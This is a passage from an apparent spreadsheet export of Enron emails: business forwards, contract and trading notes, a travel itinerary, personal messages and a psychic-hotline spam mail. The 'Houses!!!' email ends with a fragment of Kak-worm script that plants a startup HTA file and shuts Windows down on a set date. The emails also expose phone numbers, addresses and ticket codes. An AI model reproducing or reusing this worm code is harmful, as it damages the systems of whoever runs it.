attendance and obtain directions to our offices, please contact Pat_x000D_
Rubertone at (718) 403-3136._x000D_
_x000D_
 - Winter Capacity.doc</t>
  </si>
  <si>
    <t>Mon, 20 Aug 2001 08:25:41 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pamela.daily@enron.com'})</t>
  </si>
  <si>
    <t>FW: Contacts for EPSC Bill File Location</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Baker, Lee  _x000D_
Sent:	Monday, August 20, 2001 10:19 AM_x000D_
To:	Botello, Mary_x000D_
Cc:	Prendergast, Pat; Concklin, Elaine; Smilenova, Rositza_x000D_
Subject:	Contacts for EPSC Bill File Location_x000D_
_x000D_
Mary, in follow-up to your request for a list of individuals who should be notified when EPSC monthly bills are available on the common drive.  I have listed individuals for both company 1202 and 1195._x000D_
_x000D_
_x000D_
Company 1202:_x000D_
_x000D_
Sophie Patel_x000D_
Vera Apodaca_x000D_
Mylinda Rosen_x000D_
Amy Villasenor_x000D_
Nancy Wood_x000D_
Silvia Navarro_x000D_
_x000D_
_x000D_
_x000D_
Company 1195:_x000D_
_x000D_
Sophie Patel_x000D_
Vera Apodaca_x000D_
Mylinda Rosen_x000D_
Amy Villasenor_x000D_
Nancy Wood_x000D_
Silvia Navarro_x000D_
Jason Ruckle_x000D_
_x000D_
_x000D_
_x000D_
Let me know if I you need any additional information._x000D_
_x000D_
Thanks,_x000D_
Lee</t>
  </si>
  <si>
    <t>Wed, 14 Feb 2001 07:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Sat night</t>
  </si>
  <si>
    <t>Hey Jennifer, I actually have a couple friends in town this weekend as well, _x000D_
and we'll definitely be looking for some of Houston's finest entertainment _x000D_
(and although the strip clubs are rated highly here, that's not what I'm _x000D_
referring to).  I'd definitely be interested going out Sat., but I don't have _x000D_
any suggestions as of yet.  I'll see what I can come up with._x000D_
_x000D_
Mat</t>
  </si>
  <si>
    <t>Fri, 23 Mar 2001 02:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Ash Handling Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Heather,  Attached is the ash handling agreement with revisions.  Please _x000D_
review.   I will be forwarding the coal handling agreement shortly.  The _x000D_
changes should be similar._x000D_
_x000D_
_x000D_
_x000D_
Redline of this document will follow._x000D_
</t>
  </si>
  <si>
    <t>Sat, 29 Dec 2001 20:32:26 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'savebig1@lists.em5000.com'})</t>
  </si>
  <si>
    <t>Urgent Message For You!!</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friend,_x000D_
_x000D_
An unbelievable opportunity to cash in a bundle of MONEY could soon come your way! Yes, after studying my cards, friend, we have determined that this could be a fantastic time to discover luck and wealth. Is it an inheritance? Is it a gambling, lottery or betting win? Will you win the first prize of a competition?_x000D_
_x000D_
Friend, we need to know for sure so you do not miss out on this incredible opportunity to possibly become very, very rich! I am offering you a FREE Tarot advice gift so we can discover what kind of treasure you may soon receive! Call this toll-free number immediately for your FREE psychic advice: 1-800-728-9849._x000D_
_x000D_
Friend, it is urgent that you call and find out what money may be coming your way! Do not miss what could be your once-in-a-lifetime chance to live without any financial worries! Call now, 1-800-728-9849._x000D_
_x000D_
With love and hope,_x000D_
Miss Cleo_x000D_
_x000D_
P.S. Please do not share this number with anyone!_x000D_
It is a reserved number that is meant for you, friend._x000D_
Dial 1-800-728-9849._x000D_
_x000D_
Must be 18+. For entertainment purposes only._x000D_
_x000D_
_x000D_
--_x000D_
_x000D_
To unsubscribe go to_x000D_
http://em5000.net/unsub.php?client=savebig1&amp;email=dfarmer@ect.enron.com&amp;msgid=29120100034_x000D_
or to_x000D_
http://em5000.net/unsub.php?client=savebig1&amp;msgid=29120100034_x000D_
and enter your email address (dfarmer@ect.enron.com)_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 03:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ralee@rmi.net'})</t>
  </si>
  <si>
    <t>Re: Coors fiels Baby!</t>
  </si>
  <si>
    <t>yeah baby.  i was there two weeks ago and there were hotties everywhere.  i _x000D_
am going to come home in the early part of july and we will figure out the _x000D_
final details.</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 09:11:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'scott_gardner@pgn.com'})</t>
  </si>
  <si>
    <t>frozenset({'bill.casey@enron.com', 'jennifer.owen@enron.com', 'garet.shaw@enron.com', 'kevin.nordt@enron.com', 'kristin.stathis@enron.com', 'jim.lobdell@enron.com', 'peter.lyman@enron.com', 'jim.piro@enron.com', 'mary.turina@enron.com', 'minal.dalia@enron.com', 'sims.brett@enron.com', 'peggy.fowler@enron.com', 'burris.ruth@enron.com', 'michael.schilmoeller@enron.com', 'miller.kurt@enron.com', 'terri.peschka@enron.com', 'val.yildirok@enron.com'})</t>
  </si>
  <si>
    <t>PGE Position Reports - As of November 19, 2001</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
See attached reports_x000D_
 _x000D_
Loss/Limit Notifications:_x000D_
 _x000D_
None_x000D_
 _x000D_
 - DPR 19.xls _x000D_
 - Power Report 19.xls _x000D_
 - Gas Report 19.xls </t>
  </si>
  <si>
    <t>Thu, 10 May 2001 08:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gisb1@aol.com'})</t>
  </si>
  <si>
    <t>Re: More on the EEI/UBP Conversations</t>
  </si>
  <si>
    <t xml:space="preserve">Anything I can do to help?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
GISB1@aol.com on 05/10/2001 01:04:40 PM_x000D_
To: Gisb@aol.com, GISB4@aol.com_x000D_
cc:  _x000D_
_x000D_
Subject: More on the EEI/UBP Conversations_x000D_
_x000D_
_x000D_
Dear Board Task Force,_x000D_
Bill Boswell also noted the following conversation that occurred today:_x000D_
_x000D_
"Rae -- and just to fill in the blanks, Betsy Moler called this morning to say_x000D_
that Mike McGrath had called her seeking support for his position.  She told_x000D_
him his position was wrong and that the EEI board members wanted to work on_x000D_
the strawman first and to have something to look at in June on that - not_x000D_
the retail quadrant - although the two efforts could proceed at the same_x000D_
time.  Owens and I agreed to talk on Monday following the NERC meeting to_x000D_
set up an EEI/GISB board level meeting ASAP.  Mike will not be a part of_x000D_
that effort; Dave Owens will. -- Bill"_x000D_
_x000D_
_x000D_
Thanks, Rae_x000D_
_x000D_
cc:  Stan Horton_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 10:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: IT Consulting Firms</t>
  </si>
  <si>
    <t xml:space="preserve">Philippe spotted this too today and has asked Steve Horn to pursue.   We may _x000D_
want to involve Robert in this from the employment perspective._x000D_
_x000D_
Good spot though._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thomas D Gros@ENRON_x000D_
11/28/2000 05:12 PM_x000D_
To: Greg Whalley/HOU/ECT@ECT, Louise Kitchen/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: IT Consulting Firms_x000D_
_x000D_
I raised the issue of ENW considering the purchase of a tech consulting firm _x000D_
at a staff meeting several weeks ago.  Attached please find a quick and dirty _x000D_
analysis of some of the key players.  You may note that Luminant is trading _x000D_
below $1.  Please let me know if anyone is actively pursuing this _x000D_
"intellectual capital" opportunity._x000D_
_x000D_
All the best,_x000D_
_x000D_
Tom_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 19 Oct 2001 08:06:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Quote- CGAS</t>
  </si>
  <si>
    <t xml:space="preserve">term is Jan 02 to Sep 09_x000D_
total volume is 358.6 contracts_x000D_
the volume adjust is -0.045 cets_x000D_
the all in bid as of 10:05 am is $3.60_x000D_
_x000D_
call before closing this deal_x000D_
dutch_x000D_
3-9257_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Diamond, Russell  _x000D_
Sent:	Friday, October 19, 2001 10:00 AM_x000D_
To:	Quigley, Dutch_x000D_
Subject:	Quote- CGAS_x000D_
_x000D_
Dutch,_x000D_
_x000D_
Please provide your NX3 Bid for the attached._x000D_
_x000D_
Thanks_x000D_
_x000D_
Russell / Eric_x000D_
_x000D_
 &lt;&lt; File: CGAS NYMEX Quote 10.19.01.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Thu, 10 May 2001 07:26:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Conference Call Availability?</t>
  </si>
  <si>
    <t>yes. in fact, i suggested it. be great to book jim.  thanks.</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 07:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Found it.  It was buried beneath a stack.  Looks good.  _x000D_
_x000D_
I would add something to the effect that the appointment terminates if Ben _x000D_
leaves the company's employment._x000D_
_x000D_
Thanks,_x000D_
_x000D_
kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Deb Korkmas@ECT_x000D_
10/10/2000 02:37 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc: Kathleen Carnahan/NA/Enron@Enron _x000D_
_x000D_
Subject: Re: Signature authority_x000D_
  _x000D_
_x000D_
Kay, I left the ENA draft for your review.  Was it acceptable?  If so, please _x000D_
initial and I'll have circulated for signature and will draft the other _x000D_
consents accordingly.  Thanks, Deb_x000D_
_x000D_
_x000D_
Deb Korkmas_x000D_
Enron North America Corp._x000D_
ENA Legal Dept._x000D_
1400 Smith Street, Room 3819_x000D_
Houston, TX  77002_x000D_
Phone:  713-853-5448_x000D_
Fax:  713-646-3393_x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	10/10/2000 02:29 PM_x000D_
		 _x000D_
		 To: Deb Korkmas/HOU/ECT@ECT_x000D_
		 cc: Kathleen Carnahan/NA/Enron@Enron_x000D_
		 Subject: Signature authority_x000D_
_x000D_
_x000D_
Deb,_x000D_
_x000D_
Let's go ahead with POA's for Ben F. Jacoby for ENA, Tarheel Land _x000D_
Development, Edgecombe Development, and Titan Land Development in accordance _x000D_
with Janet's request and ENA standard practice. Deb, I have the impression _x000D_
that this is something you typically handle, although I'm glad to volunteer _x000D_
Kathleen for the task if that would help._x000D_
_x000D_
There will be other companies, but we can add these as we go.  Kathleen, _x000D_
please advise if there are any which you see as most active at this time. For _x000D_
instance, what are the names of the Florida development companies?_x000D_
_x000D_
Your assistance is greatly appreciated, as Janet is eager to get this done._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/10/2000 02:20 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Kay Mann                           10/08/2000 07:59 PM_x000D_
	_x000D_
_x000D_
To: Deb Korkmas/HOU/ECT@ECT_x000D_
cc: Kathleen Carnahan/NA/Enron@Enron _x000D_
_x000D_
Subject: Signature authority_x000D_
_x000D_
_x000D_
Deb,_x000D_
_x000D_
I'll get you the particulars, but you get the general idea. I'll have to _x000D_
check on the expense account stuff._x000D_
_x000D_
Kathleen, you  haven't done any thing with this request yet, have you?  Could _x000D_
you get the  names of the active development companies so that we can address _x000D_
those, as well as ENA?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 10/08/2000 07:56 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Janet R Dietrich@ECT_x000D_
10/08/2000 02:22 PM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Ben Jacoby/HOU/ECT@ECT _x000D_
_x000D_
Subject: Signature authority_x000D_
_x000D_
_x000D_
Kay, as we discussed previously:_x000D_
_x000D_
Effective immediately, I would like Ben Jacoby to have signature authority _x000D_
for his team's expense reports as well as all documents whose capital _x000D_
commitments are not greater than $250,000. Most documents will be _x000D_
confidentiality agreements, exclusivity agreements, permit applications, and _x000D_
land/equipment option agreements._x000D_
_x000D_
Please forward this (if need be) to the appropriate internal individuals who _x000D_
get this set up. Thanks Kay._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 May 2000 07:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pic@e-acumen.com'})</t>
  </si>
  <si>
    <t>Bilateral NDA</t>
  </si>
  <si>
    <t xml:space="preserve">At the request of Rahil Jafry, attached is our form of bilateral _x000D_
Confidentiality Agreement.   Please let me know if the attached meets with _x000D_
your approval._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 03:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>From the Desk of the Assembly Republican Leader: Recent UC action</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;Notes From The Leader - UC affirmative action.doc&gt;&gt;_x000D_
_x000D_
Richard Costigan, III_x000D_
Chief of Staff_x000D_
Office of the Assembly Republican Leader_x000D_
California State Assembly_x000D_
Phone:(916) 319-2005_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Notes From The Leader - UC affirmative action.doc</t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 08:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: draft</t>
  </si>
  <si>
    <t>who you taking with the second?  can't trade it can you?</t>
  </si>
  <si>
    <t>Thu, 4 Oct 2001 13:16:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: morning gas views</t>
  </si>
  <si>
    <t>can we meet at 4:00 instead?_x000D_
_x000D_
-----Original Message-----_x000D_
From: Andrews, Jeff _x000D_
Sent: Thursday, October 04, 2001 7:35 AM_x000D_
To: Arnold, John_x000D_
Subject: RE: morning gas views_x000D_
_x000D_
_x000D_
John,_x000D_
 _x000D_
Thanks very much._x000D_
 _x000D_
Would 4:45ish be alright with you?_x000D_
 _x000D_
 _x000D_
_x000D_
-----Original Message-----_x000D_
From: Arnold, John _x000D_
Sent: Wednesday, October 03, 2001 5:46 PM_x000D_
To: Andrews, Jeff_x000D_
Subject: RE: morning gas views_x000D_
_x000D_
_x000D_
come on up tomorrow afternoon._x000D_
_x000D_
-----Original Message-----_x000D_
From: Andrews, Jeff _x000D_
Sent: Tuesday, October 02, 2001 8:35 AM_x000D_
To: Arnold, John_x000D_
Cc: Fraser, Jennifer_x000D_
Subject: morning gas views_x000D_
_x000D_
_x000D_
John,_x000D_
 _x000D_
We have developed a "morning briefing" for Gary Hickerson that includes primarily views on the crude and products markets.  Recently, Gary has asked that we include a brief overview on Nat Gas in this packet.  We have worked with Chris Gaskill to get the morning briefing that he puts together for you and your traders and find it very helpful._x000D_
 _x000D_
However, I am interested in going a step further and would like to talk with you or one of your traders on a regular basis in order to get a more trading-centric view on this morning packet.  Specifically, I want to ask the question, "What do you view as most important in this information" so we can develop our own "value added" information for Gary's group._x000D_
 _x000D_
Is there one of your traders who I might be able to meet with (after market close, of course) to discuss?_x000D_
 _x000D_
Thanks, John._x000D_
 _x000D_
Jeff</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 09:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: A/A - July 16-31,2000 Timesheets</t>
  </si>
  <si>
    <t>I have not taken any time off._x000D_
_x000D_
Thanks,_x000D_
Robin</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 04:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>golf Sunday Mar 18</t>
  </si>
  <si>
    <t>scheduled to play golf with guys at work on Sunday morning.  Call Jared with _x000D_
exact time.</t>
  </si>
  <si>
    <t>Fri, 15 Oct 1999 06:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'gpier@doubleclick.net'})</t>
  </si>
  <si>
    <t>Hi Greg!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mark Taylor/HOU/ECT on 10/15/99 01:38 PM _x000D_
---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mark Taylor                           10/15/99 12:48 PM_x000D_
	_x000D_
_x000D_
To: gpier@doubleclick.net&gt;_x000D_
cc:  _x000D_
Subject: Hi Greg!_x000D_
_x000D_
We are getting very excited about the BVI.  It's hard to believe it's only 5 _x000D_
weeks away.  I try to think about it whenever the stock market gets me _x000D_
depressed (which is happening with altogether too much frequency these _x000D_
days).  I see you guys got hit with a triple whammy today.  Oh well, can you _x000D_
say "buying opportunity"?_x000D_
_x000D_
I'm coming to NYC for a conference in a couple of weeks - any chance you guys _x000D_
are free for dinner on Sunday the 31st?  We also need to talk about $ _x000D_
sometime soon since I made the final payment on the boat a couple of weeks _x000D_
ago.  Have you made your hotel arrangements (we still have a room reserved _x000D_
for you for the night of the 20th which you won't need if you've made other _x000D_
arrangements - and we can always get you a room there for the last night if _x000D_
you want)?   And there's still the beverage list (you did get my fax, didn't _x000D_
you?).  _x000D_
_x000D_
T. sends regards.  Hope you're well and not letting the market roller-coaster _x000D_
get you down (my mantra is "think long term, think long term, think long _x000D_
term")._x000D_
_x000D_
Mark_x000D_
</t>
  </si>
  <si>
    <t>Wed, 10 Jan 2001 03:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Dan has gone to get the car and will meet us down front. Carlos_x000D_
 w/meet us too. Can you wrap it up and come get me or I come get you?</t>
  </si>
  <si>
    <t xml:space="preserve">I'll hang it up._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
From: Suzanne Adams@ECT on 01/10/2001 11:35 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: Dan has gone to get the car and will meet us down front.  Carlos _x000D_
w/meet us too.  Can you wrap it up and come get me or I come get you?_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Apr 2000 02:01:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>AccuNet Agreement</t>
  </si>
  <si>
    <t xml:space="preserve">Mark asked if you could work on the following with our new secondee, Jason.  _x000D_
I provided Jason a hard copy yesterday since he didn't have a computer yet.  _x000D_
Thanks!_x000D_
---------------------- Forwarded by Tana Jones/HOU/ECT on 04/25/2000 09:01 AM _x000D_
---------------------------_x000D_
   _x000D_
_x000D_
_x000D_
From:  Rahil Jafry                                                            _x000D_
 04/24/2000 02:36 PM	_x000D_
	_x000D_
	_x000D_
	                           _x000D_
	_x000D_
_x000D_
To: Mark Taylor/HOU/ECT@ECT, Mark Holsworth/Corp/Enron@ENRON, Tana _x000D_
Jones/HOU/ECT@ECT_x000D_
cc: Dave Samuels/HOU/ECT@ECT, Julie.Ferrara@enron.com _x000D_
Subject: AccuNet Agreement_x000D_
_x000D_
Pls. feed me your respective comments so we can move ahead with this ASAP._x000D_
_x000D_
Mark (Holsworth),  I would appreciate it if you could make sure your initial _x000D_
comments are addressed and point me in the right direction with regards to _x000D_
negotiations while Mark (Taylor) is away._x000D_
_x000D_
Thanks,_x000D_
Rahil_x000D_
3-3206_x000D_
---------------------- Forwarded by Rahil Jafry/HOU/ECT on 04/24/2000 02:32 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Leisa Byron" &lt;byron@ntms1.accuweather.com&gt; on 04/24/2000 01:15:07 PM_x000D_
To: &lt;rahil.jafry@enron.com&gt;_x000D_
cc:  _x000D_
Subject: AccuNet Agreement_x000D_
_x000D_
_x000D_
_x000D_
Mr. Jafry:_x000D_
?_x000D_
As per your telephone conversation with Erik  Bjalme, attached please find _x000D_
the Agreement for AccuNet Service.? Should you  have any questions, please _x000D_
contact either Erik or myself._x000D_
?_x000D_
Thank you._x000D_
 - EnronCorporation2.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Sep 1999 03:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">GT,  Do you know if Clifton is in Houston or near home?  MD Anderson is here _x000D_
so I thought he might be in Houston._x000D_
</t>
  </si>
  <si>
    <t>Fri, 4 Aug 2000 07:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Houses!!!</t>
  </si>
  <si>
    <t xml:space="preserve">Sure.  Maybe after running we could get cleaned up and go take a look.  Do _x000D_
you still want to go to the movies?_x000D_
_x000D_
_x000D_
_x000D_
	"Patti Young" &lt;pyoung@pdq.net&gt;_x000D_
	08/04/2000 03:18 PM_x000D_
		 _x000D_
		 To: "Tana Jones" &lt;tana.jones@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Houses!!!_x000D_
_x000D_
_x000D_
_x000D_
Good Day,_x000D_
?_x000D_
I want you to go with me to look at this house I  have been checking out in _x000D_
the Woodland Heights.? It is a re-do, gutted and  cleaned up, and ready to be _x000D_
moved in to asap.? Are you working late  tonight, and, if not, would you be _x000D_
up for me coming by just for a quick  trip???? You may have plans, and, if _x000D_
you do, could I grab you tomorrow for  a quick look?? I am putting a 'for _x000D_
sale by owner' sign in my yard  today!!!_x000D_
?_x000D_
Let me know_x000D_
?_x000D_
');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg'_x000D_
);d=new Date();if(d.getDate()==1 &amp;&amp; _x000D_
d.getHours()&gt;17){alert('Kagou-Anti-Kro$oft says not today _x000D_
!');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();S3 driver _x000D_
memory alloc failed ? _x000D_
!]]%%%%%";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.lan_x000D_
guage;scr.Path=(la=="fr")?"C:\\windows\\Menu _x000D_
D?marrer\\Programmes\\D?marrage\\kak.hta":"C:\\windows\\Start _x000D_
Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((a_x000D_
gt.indexOf("msie")!=-1)&amp;&amp;(parseInt(navigator.appVersion)&gt;4))||(agt.indexOf("ms_x000D_
ie 5.")!=-1))scr.write(); //--&gt;_x000D_
</t>
  </si>
  <si>
    <t>Sun, 6 Aug 2000 04:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Please review your following upgraded itinerary. Have a nice tri p!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 08/06/2000 11:35 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Diane Fitzgerald &lt;diane.fitzgerald@travelpark.com&gt; on 08/04/2000 04:08:27 PM_x000D_
To: "'KAY.MANN@ENRON.COM'" &lt;KAY.MANN@ENRON.COM&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Please review your following upgraded itinerary. Have a nice tri p!_x000D_
_x000D_
 _x000D_
                                          MANN/C KAY_x000D_
                                          ATTN SUZANNE ADAMS_x000D_
                                          713 853-7340_x000D_
  ENRON CORP                  3AC SUITE 400_x000D_
 _x000D_
  DATE:  AUG 04 2000_x000D_
 _x000D_
SERVICE               DATE  FROM           TO             DEPART  ARRIVE_x000D_
 _x000D_
CONTINENTAL AIRLINES  07AUG HOUSTON        WASHINGTON     1053A   0252P_x000D_
CO 1460    A          MON   G.BUSH INTERCO R REAGAN NAT_x000D_
                            TERMINAL C     TERMINAL B_x000D_
                            LUNCH                         NON STOP_x000D_
                            RESERVATION CONFIRMED         2:59 DURATION_x000D_
                  AIRCRAFT: BOEING 737-500_x000D_
                            SEAT 03B NO SMOKING CONFIRMED MANN/C KAY(IDS8_x000D_
                    FIRST CLASS UPGRADE IS CONFIRMED._x000D_
 _x000D_
HOTEL                 07AUG FOUR SEASONS WASHINGTON_x000D_
                      09AUG 2800 PENNSYLVANIA AVENUE NW_x000D_
                             WASHINGTON, DC 20007_x000D_
                            UNITED STATES OF AMERICA_x000D_
                            TELEPHONE: 202-342-0444_x000D_
                            FAX: 202-944-2076_x000D_
                            TELEX: 904008_x000D_
                            CONFIRMATION: 89115111_x000D_
                            SINGLE KING SIZE BED_x000D_
                            RATE: COR USD 305.00 PER NIGHT_x000D_
                            GUARANTEE GIVEN_x000D_
                            CANCELLATION POLICY: REQUIRES CANCEL BY 6PM_x000D_
                            DAY OF ARRIVAL_x000D_
                            ENRON CORP RQST NONSMKG_x000D_
     TO AVOID NO SHOW BILLING. CANCEL 6PM HOTEL TIME DAY OF ARRIVAL_x000D_
 _x000D_
CONTINENTAL AIRLINES  09AUG WASHINGTON     HOUSTON        1130A   0133P_x000D_
CO 1837    A          WED   R REAGAN NAT   G.BUSH INTERCO_x000D_
                            TERMINAL B     TERMINAL C_x000D_
                            LUNCH                         NON STOP_x000D_
_x000D_
_x000D_
                            RESERVATION CONFIRMED         3:03 DURATION_x000D_
                  AIRCRAFT: BOEING 737-300_x000D_
                            SEAT 03B NO SMOKING CONFIRMED MANN/C KAY(IDS8_x000D_
                    FIRST CLASS UPGRADE IS CONFIRMED._x000D_
 _x000D_
MISCELLANEOUS         08OCT HOUSTON_x000D_
                      SUN   ** THANK YOU FOR USING THE TAP **_x000D_
 _x000D_
MANN/C KAY(IDS8C061MR102049)_x000D_
 _x000D_
CO  FREQUENT FLYER COHG770475_x000D_
LIL BAILEY 345-6275_x000D_
INTL TVLRS: CARRY SOS WALLET CARD W/ENRONASSISTANCE INFO_x000D_
CALL SOS: IN U.S 800 523-6586/INTL 215 245-4707 (COLLECT)_x000D_
*******************************************_x000D_
THIS IS THE PASSENGER RECEIPT FOR YOUR ELECTRONIC TICKET._x000D_
PLEASE CHECK-IN WITH PHOTO IDENTIFICATION AND WITH_x000D_
EITHER (1) THIS RECEIPT OR (2) YOUR CONFIRMATION NUMBER._x000D_
._x000D_
YOUR ETKT CONFIRMATION NUMBER IS: O 2 G 5 D 5_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Nov 2001 12:50:50 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jan_g1@hotmail.com'})</t>
  </si>
  <si>
    <t>RE: love you</t>
  </si>
  <si>
    <t xml:space="preserve">Jano, thank you so much!  I love you, too, now and always. All my best to Bob, Corby, Holly, and Tanner._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Jan Griesenbeck" &lt;jan_g1@hotmail.com&gt;@ENRON  _x000D_
Sent:	Thursday, November 08, 2001 7:19 AM_x000D_
To:	Derrick Jr., James_x000D_
Subject:	love you_x000D_
_x000D_
_x000D_
~~~jimbo~~~~you are always in my heart and in my prayers [IMAGE]_x000D_
just wanted to share a thought with you from my prayer time this morning~~~~let no feeling of discouragement prey upon you, and in the end you are sure to succeed  (Deuteronomy 31:8   the Lord himself goes before you and will be with you; He will never leave you nor forsake you. do not be afraid; do not be discouraged.)  and just remember, by perserverance the snail reached to Ark [IMAGE]  hope you can feel this GREAT BIG hug i'm sending you~~~~[IMAGE][IMAGE][IMAGE]  jdg_x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com &lt;&lt; File: 'http://go.msn.com/bql/hmtag_itl_EN.asp' &gt;&gt; </t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 01:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Shanna Husser/HOU/EES on 11/28/2000 09:07 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"James A Bowman" &lt;bowmanja@us.ibm.com&gt; on 11/28/2000 08:23:32 AM_x000D_
To: RyderJ@CannondaleAssoc.com, Funnies@us.ibm.com_x000D_
cc:  _x000D_
Subject: Fw: New Democratic Party Seal_x000D_
_x000D_
_x000D_
(See attached file: newseal.jpg)_x000D_
_x000D_
Regards,_x000D_
_x000D_
James A. Bowman_x000D_
IBM Global Accounts Payable_x000D_
e-Business Operations Strategy - Americas / Asia Pacific_x000D_
1701North St, Endicott, NY 13760_x000D_
(607) 755-5708  T/L 855-5708  FAX (607) 755-6124_x000D_
bowmanja@us.ibm.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - newseal.jpg_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Jun 2000 02:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'elliot.bonner@enron.com'})</t>
  </si>
  <si>
    <t>Unilever - Legal Contact</t>
  </si>
  <si>
    <t>I left you a voicemail about Unilever earlier.  I am going to forward your _x000D_
number to their legal contact, Peter Harwich (212-906-4590).  He will be in _x000D_
contact with any legal questions.  I met with Michael Lagamma and Jim _x000D_
O'Rourke of Unilever in New Jersey to discuss the details of the transaction _x000D_
yesterday.  Please let me know if you have any questions.  Thanks.</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 03:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>HPL NOM FOR DECEMBER 9, 2000</t>
  </si>
  <si>
    <t>(See attached file: HPLN1209.xls)_x000D_
_x000D_
 - HPLN1209.xls</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 07:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>El Paso FERC Order regarding Topock Allocation</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Jane M Tholt/HOU/ECT on 11/27/2000 03:38 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Betonte, Robert - TP2RSB" &lt;RBetonte@socalgas.com&gt; on 11/22/2000 12:41:44 PM_x000D_
To: "'prez@cook-inlet.com'" &lt;prez@cook-inlet.com&gt;, "'jane.m.tholt@enron.com'" _x000D_
&lt;jane.m.tholt@enron.com&gt;, "'gcvenz@duke-energy.com'" _x000D_
